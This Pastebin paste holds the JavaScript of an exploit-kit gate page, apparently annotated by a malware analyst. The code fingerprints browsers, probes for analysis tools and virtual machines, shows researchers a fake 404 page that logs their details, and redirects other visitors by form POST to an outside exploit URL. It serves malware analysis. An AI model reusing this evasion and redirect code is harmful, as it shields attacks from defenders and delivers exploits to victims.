Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!DOCTYPE html>
- <html lang="en">
- <head>
- <title></title>
- <meta charset="UTF-8">
- <meta http-equiv="X-UA-Compatible" content="IE=EDGE">
- <meta name="apple-mobile-web-app-capable" content="yes">
- <meta name="apple-mobile-web-app-status-bar-style" content="black">
- <meta name="viewport" content="width=device-width, initial-scale=1.0">
- </head>
- <body>
- <iframe onload="window.setTimeout('go()', 99)" src="about:blank" style="visibility:hidden"></iframe>
- <script>
- var NormalURL = 'http://try[.]WERREW[.]INFO/?oq=m3Wp_YrLbNVNVDhiECBclBhnYlZW1NHovv9h0jUzR6fhMHQ-UHbUTp1u9CQUbI&q=wXjQMvXcJwDQCobGMvrESLtNNknQA0KK2Iv2_dqyEoH9cmnihNzUSkrx6B2aC';
- var InfoStr = '';
- var appPaths,foundObjects,appsCount,framesLoaded,foundAppsCounter,iFrameObject;
- var iFrameName = 'myFrame';
- var debug = false;
- var isChecked = 0;
- // doubly-declared? but initialized by calling the genPaths() function
- var appPaths = genPaths();
- function getBrowser() {
- var ua = navigator.userAgent;
- var browsrObj = {
- browser: 'unknown',
- browser_real: '',
- is_bot: false,
- browser_quality: 0,
- platform: 'desktop',
- versionFull: '',
- versionShort: ''
- };
- try{
- var bName = function () {
- if (ua.search(/Edge/) > -1) return "edge";
- if ((ua.search(/MSIE/) > -1) || (ua.search(/Trident/) > -1)) return "ie";
- if (ua.search(/Firefox/) > -1) return "firefox";
- if ((ua.search(/Opera/) > -1) || (ua.search(/OPR/) > -1)) return "opera";
- if (ua.search(/YaBrowser/) > -1) return "yabrowser";
- if (ua.search(/Chrome/) > -1) return "chrome";
- if (ua.search(/Safari/) > -1) return "safari";
- if (ua.search(/Maxthon/) > -1) return "maxthon";
- else return "unknown";
- }();
- browsrObj.browser = bName;
- if(/iphone|ipad|ipod|android|blackberry|mini|windows\sce|palm/i.test(navigator.userAgent.toLowerCase())) browsrObj.platform = 'mobile';
- var version;
- if(bName != 'unknown')
- {
- switch (bName) {
- case "edge":
- version = (ua.split("Edge")[1]).split("/")[1];
- break;
- case "ie":
- if((ua.search(/Trident/) > -1))
- {
- version = (ua.split("; rv:")[1]).split(")")[0];
- }
- else
- {
- version = (ua.split("MSIE ")[1]).split(";")[0];
- }
- break;
- case "firefox":
- version = ua.split("Firefox/")[1];
- break;
- case "opera":
- version = ua.split("Version/")[1];
- break;
- case "operaWebkit":
- bName = "opera";
- version = ua.split("OPR/")[1];
- break;
- case "yabrowser":
- version = (ua.split("YaBrowser/")[1]).split(" ")[0];
- break;
- case "chrome":
- version = (ua.split("Chrome/")[1]).split(" ")[0];
- break;
- case "safari":
- version = (ua.split("Version/")[1]).split(" ")[0];
- break;
- case "maxthon":
- version = ua.split("Maxthon/")[1];
- break;
- }
- browsrObj.versionFull = version;
- browsrObj.versionShort = version.split(".")[0];
- }
- } catch (err) {}
- var w=window,d=document;
- var CorrectBrowser = true;
- var uaBrowser = browsrObj;
- var isIE = isChrome = isFirefox = isOpera = 0;
- if(uaBrowser.platform != 'mobile' && (browsrObj.browser == 'ie' || browsrObj.browser == 'chrome' || browsrObj.browser == 'firefox'))
- {
- if('ActiveXObject' in window) isIE++;
- if('chrome' in window) isChrome++;
- if('opera' in window) isOpera++;
- if('getBoxObjectFor' in d || 'mozInnerScreenX' in w) isFirefox++;
- if('WebKitCSSMatrix' in w||'WebKitPoint' in w||'webkitStorageInfo' in w||'webkitURL' in w) isChrome++;
- var f=0;
- f|='sandbox' in d.createElement('iframe')?1:0;
- f|='WebSocket' in w?2:0;
- f|=w.Worker?4:0;
- f|=w.applicationCache?8:0;
- f|=w.history && history.pushState?16:0;
- f|=d.documentElement.webkitRequestFullScreen?32:0;
- f|='FileReader' in w?64:0;
- if(f==0) isIE++;
- if(isIE > 0)
- {
- browsrObj.browser_real = 'ie';
- browsrObj.browser_quality = isIE;
- }
- if(isChrome > 1 && isFirefox == 0)
- {
- browsrObj.browser_real = 'chrome';
- browsrObj.browser_quality = isChrome;
- }
- if(isFirefox > 0 && isChrome == 0)
- {
- browsrObj.browser_real = 'firefox';
- browsrObj.browser_quality = isFirefox;
- }
- if(uaBrowser.browser != uaBrowser.browser_real) browsrObj.is_bot = true;
- }
- InfoStr += browsrObj.browser+'-'+browsrObj.browser_real+'_ie'+isIE+'chrome'+isChrome+'firefox'+isFirefox;
- return browsrObj;
- }
- //////////////////////////////////////////////// THIS LOOKS LIKE WHERE THE NEW_PRE-FILTER_CHECKS STARTS ////////////////////////////////////////////////
- // Tests for debugging, and the logs the value passed into deb(c).
- function deb(o) {
- if (!debug) return false;
- console.log(o);
- }
- // This function is called from within the createiFrame(), objectStateCheck(), countFrameLoaded(), and go() functions.
- // The return value is the version number, otherwise, -1.
- function getInternetExplorerVersion() {
- // Declare and assign the variable 'rv' to the value -1.
- var rv = -1;
- // Parse out the verison of the Internet Explorer browser.
- if (navigator.appName == 'Microsoft Internet Explorer') {
- var ua = navigator.userAgent;
- // Checks for versions prior to IE11.
- var re = new RegExp("MSIE ([0-9]{1,}[\.0-9]{0,})");
- // Executes for a search in a string ('ua') for the regex object ('re').
- if (re.exec(ua) != null)
- // As long as the return value was not null, then parse out the version.
- rv = parseFloat( RegExp.$1 );
- } else if (navigator.appName == 'Netscape') {
- // Same operations done for the Netscape derivative.
- var ua = navigator.userAgent;
- var re = new RegExp("Trident/.*rv:([0-9]{1,}[\.0-9]{0,})");
- if (re.exec(ua) != null)
- rv = parseFloat( RegExp.$1 );
- }
- return rv;
- }
- // This function is called from the go() function.
- function createiFrame(c){
- // Initialize and assign the iframe on the page.
- var d=document.createElement('iframe');
- // Set the 'id' attribute to 'myFrame' plus the current for-loop index. For example, 'myFrame0', 'myFrame1', etc.
- d.setAttribute('id',iFrameName+c);
- // Set the 'name' attribute of the iframe to the same value of the 'id' field. For example, 'myFrame0', 'myFrame1', etc.
- d.setAttribute('name',iFrameName+c);
- // Set the height and width of the iframe to a single pixel.
- d.style['width']='1px'
- d.style['height']='1px';
- // The function delclaration for zrs() exists to call the function "objectCheckState(c)".
- function zrs(){objectCheckState(c);}
- // The function declaration for zlo() exists to call the function "countFrameLoaded(c)".
- function zlo(){countFrameLoaded(c);}
- // If the victim's browser is IE11, then perform the following setAttribute methods.
- if (getInternetExplorerVersion()==11) {
- // Specifies what function to be called when the readyState property changes.
- d.setAttribute('onReadyStateChange',"objectCheckState('"+c+"')");
- // This event occurs when an object has been loaded.
- d.setAttribute('onLoad',"countFrameLoaded('"+c+"')");
- } else {
- // If the browser version is not IE11, then do the following.
- // Use eventListeners to perform the same functions above done with the setAttribute methods.
- if(d['addEventListener']){
- // Add the listener and then call the zrs() function when the readyState property changes.
- // This performs a objectCheckState(c) function called through the zrs() function call.
- d['addEventListener']('readystatechange',zrs,false);
- // Add the listener and then call the zlo() function when the document has been loaded.
- // This performs a countFrameLoaded(c) function called through the zlo() function call.
- d['addEventListener']('load',zlo,false);
- } else {
- // If the 'addEventListener' means didn't work, then try the same iframe state changes with 'attachEvent'.
- if(d['attachEvent']){
- d['attachEvent']('on'+'readystatechange',zrs);
- d['attachEvent']('on'+'load',zlo);
- }
- }
- }
- // Set the source attribute to the 'res' key's value and then add the child to the document.
- d.setAttribute('src',appPaths[c]['res']);
- document.body.appendChild(d);
- }
- function objectCheckState(c){
- // For IE11 browsers.
- if (getInternetExplorerVersion()==11) {
- // For when the 'stateIterate' value is zero, this state indicates the readyState is request not initialized.
- if (!appPaths[c]['stateIterate'])
- // Then, set the readyState of the iframe to server connection established.
- appPaths[c]['stateIterate']=1;
- // Otherwise, then increment the readyState of the iframe from whatever the current state of it is.
- // This would occur when more than a single call is made on the iframe.
- else appPaths[c]['stateIterate']++;
- }
- // This is done for none IE11 browsers; however, this will be done twice by the IE11 browsers.
- // Define and assign the readyState of the iframe and perform the same behavior above.
- var rs = document.getElementById(iFrameName+c).readyState;
- if (!appPaths[c][rs])
- appPaths[c][rs]=1;
- else appPaths[c][rs]++;
- }
- // This function is called from within the createiFrame(c) function
- function countFrameLoaded(c){
- // Find the appPaths name of the current for-loop interation index.
- var _cfl_appName=appPaths[c]['name'];
- // Find the appPaths type of the current for-loop interation index.
- var _cfl_appType=appPaths[c]['type'];
- // Here test if: interactive > 1 OR (stateIterate == 1 AND IE11)
- if(appPaths[c]['interactive']>1 || (appPaths[c]['stateIterate']==1 && getInternetExplorerVersion()==11)){
- // Push that application name onto the foundObjects stack.
- foundObjects.push(_cfl_appName);
- } else {
- };
- // Increment the current counter of how many frames have been loaded.
- framesLoaded++;
- // If the number of iframes counted equals the number of applications loaded for checking, then call the finishChecking() function.
- if (framesLoaded==appsCount) {
- finishChecking();
- }
- }
- // This function is called from within the countFrameLoaded(c) function, and accepts no input.
- function finishChecking() {
- // BrowserInfo contains the browserObj returned from getBrowser().
- BrowserInfo = getBrowser();
- // This variable is initialized as 0 at the beginning of the document.
- isChecked++;
- // This checks for objects found such as: AV, VMs, etc.
- // The operations done on the foundObjects iteration was commented out.
- if (foundObjects.length>0) {
- dopStr = 'VM';
- for (i in foundObjects) {
- //dopStr = dopStr+'_'+foundObjects[i];
- }
- // This is just going to contain "VMVMVMVMVM" for however many found objects there are.
- InfoStr =InfoStr+dopStr;
- }
- // If the browser is a bot or there are several objects found. Print the same string that would be printed for when isChecked is zero.
- if(BrowserInfo.is_bot == true || foundObjects.length>0) {
- document.write('<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.2.22 (Debian) Server Port 80</address><iframe src="/log.php?info='+InfoStr+'" width=10 height=10></iframe></body></html>');
- } else {
- // If this is not a bot, then post the document back as normal (the EK request).
- window.frames[0].document.body.innerHTML = '<form target="_parent" method="post" action="'+NormalURL+'"></form>'; window.frames[0].document.forms[0].submit();
- }
- // Then call the deleteiFrame('myFrame#') function.
- var b=0;
- for(b=0;b<appsCount;b++){
- deleteiFrame('myFrame'+b);
- }
- }
- // This function is called from within the finishChecking() function.
- function deleteiFrame(c) {
- // Find the iframe and then remove the child.
- var d=document.getElementById(c);
- d.parentNode.removeChild(d);
- }
- // This function is first called at the beginning of the html page to assign the value to the "appPaths" variable.
- function genPaths() {
- // below are three declared and assigned variables for static strings on the machine
- // in this case, the System32, Program Files, and Program Files (x86) paths
- var path_sys32 = '\\Windows\\System32\\drivers\\',
- path_pf = 'C:\\Program Files\\',
- path_pfx86 = 'C:\\Program Files (x86)\\';
- // The variable "appPath" is an array of dictionaries that contains key-value pairs for tools, AV, and VMs.
- // It appears these are dictionary structures that contain the path location to cross-reference the victim machine for these items.
- // NOTE, the AV signatures have been commented out currently for some reason.
- var appPath = [
- {name:'Fiddler2',resident:'/#24/1',res:'Fiddler2\\Fiddler.exe',type:'tool',filetype:'pf'},
- {name:'Fiddler2',resident:'/#24/1',res:'Fiddler2\\uninst.exe',type:'tool',filetype:'pf'},
- {name:'FFDec',resident:'/#24/1',res:'FFDec\\Uninstall.exe',type:'tool',filetype:'pf'},
- /* the two path signatures were commented out for some reason
- {name:'NOD32',resident:'/#24/1',res:'ESET\\ESET NOD32 Antivirus\\egui.exe',type:'av',filetype:'pf'},
- {name:'Bitdefender',resident:'/#24/1',res:'Bitdefender Agent\\ProductAgentService.exe',type:'av',filetype:'pf'},
- */
- {name:'VirtualBox',resident:'/#24/#1',res:'Oracle\\VirtualBox Guest Additions\\uninst.exe', type:'vm',filetype:'pf'},
- {name:'VMware',resident:'/#16/#1',res:'VMware\\VMware Tools\\TPAutoConnSvc.exe',type:'vm',filetype:'pf'},
- {name:'VMware',resident:'/#24/2',res:'VMware\\VMware Tools\\VMToolsHook.dll',type:'vm',filetype:'pf'}
- ];
- // Initializes the variable "appPathsCompilled" to an empty array.
- var appPathsCompilled = [];
- for(var i=0;i<appPath.length;i++) {
- // Currently, no dictionary keys for filetype that has been assigned the value of 'driver', thus this is not executed.
- if (appPath[i]['filetype']=='driver') {
- appPathsCompilled.push({name:appPath[i]['name'],res:'res://' + path_sys32 + appPath[i]['res'] + '.sys' + appPath[i]['resident'], resident:appPath[i]['resident'], type:appPath[i]['type'],filetype:appPath[i]['filetype']});
- }
- // All the files in the appPath dictionary array have a filetype of 'pf'.
- // Then the files are constructed into a dictionary and pushed onto the array (stack), with the paths for both Program Files and x86
- if (appPath[i]['filetype']=='pf') {
- appPathsCompilled.push({name:appPath[i]['name'],res:'res://' + path_pfx86 + appPath[i]['res'] + appPath[i]['resident'], resident:appPath[i]['resident'], type:appPath[i]['type'],filetype:appPath[i]['filetype']});
- appPathsCompilled.push({name:appPath[i]['name'],res:'res://' + path_pf + appPath[i]['res'] + appPath[i]['resident'], resident:appPath[i]['resident'], type:appPath[i]['type'],filetype:appPath[i]['filetype']});
- }
- }
- return appPathsCompilled;
- }
- // This function is called by the iframe at the top of the html page and that same iframe specifies a timeout of 99ms
- function go() {
- // Initialize the foundObjects variable declared at the beginning of the html page
- foundObjects=[];
- // With an appPath.length of seven and then doubled by adding a Program Files and Program Files (x86) versions, then this should be fourteen
- appsCount=appPaths.length;
- // Initialize the framesLoaded variable.
- framesLoaded=0;
- // Initialize the iFrameObject variable to an empty array.
- iFrameObject={};
- for(var c=0;c<appsCount;c++) {
- // Check to ensure the given array index of appPaths[] is not 'undefined', otherwise, the error should be logged to the browser's console.log.
- if (typeof appPaths[c] == 'undefined') deb('IS UNDEFINED '+c);
- // If not 'undefined', then create the iframe by calling the createiFrame(c) function.
- // The value passed into the createiFrame(c) function is the current index of the for-loop.
- createiFrame(c);
- }
- // If the finishChecking() function is never run, then the value of isChecked does not changed and, consequently, will remain as 0 (or boolean false)
- if(isChecked == false) {
- BrowserInfo = getBrowser();
- // Check the is_bot field, if it's true; then write the information below. This is the 404 Not Found and specifying the contacted version of server.
- // The iframe is the domain "/log.php?info=" + InfoStr + "NOchecked".
- if(BrowserInfo.is_bot == true) {
- document.write('<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.2.22 (Debian) Server Port 80</address><iframe src="/log.php?info='+InfoStr+'NOchecked" width=10 height=10></iframe></body></html>');
- }
- // If the is_bot field is false, then print the information below. This is the 404 Not Found and specifying the contacted version of server.
- // The iframe contains more information "/log.php?info=" + InfoStr + "NOcheckedNOBOT" + browserVersion.
- else {
- window.frames[0].document.body.innerHTML = '<form target="_parent" method="post" action="'+NormalURL+'"></form>'; window.frames[0].document.forms[0].submit();
- //document.write('<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.2.22 (Debian) Server Port 80</address><iframe src="log.php?info='+InfoStr+'NOcheckedNOBOT'+getInternetExplorerVersion()+'" width=10 height=10></iframe></body></html>');
- }
- }
- }
- </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement